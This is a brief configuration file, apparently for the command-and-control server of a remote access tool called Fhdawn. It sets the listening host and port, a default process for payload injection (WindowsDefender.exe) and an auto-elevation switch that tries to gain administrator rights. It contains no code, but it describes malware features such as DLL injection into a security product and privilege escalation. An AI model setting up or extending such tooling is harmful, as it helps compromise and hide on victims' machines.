[DEFAULT]
# The Host of the server, Don't change this value
host = 0.0.0.0
# The port of the server, You can change this, Make sure Fhdawn is connecting on this port
port = 421
# Default Process to Inject Payloads into
# when running dllinject command this does not apply because you are asked for the process
# This is for dps only
inject_process = WindowsDefender.exe
# auto_elevate 
# Turn this switch on to automatically attempt to be admin on startup.
# after turning this on rebuild fhdawn
auto_elevate = False 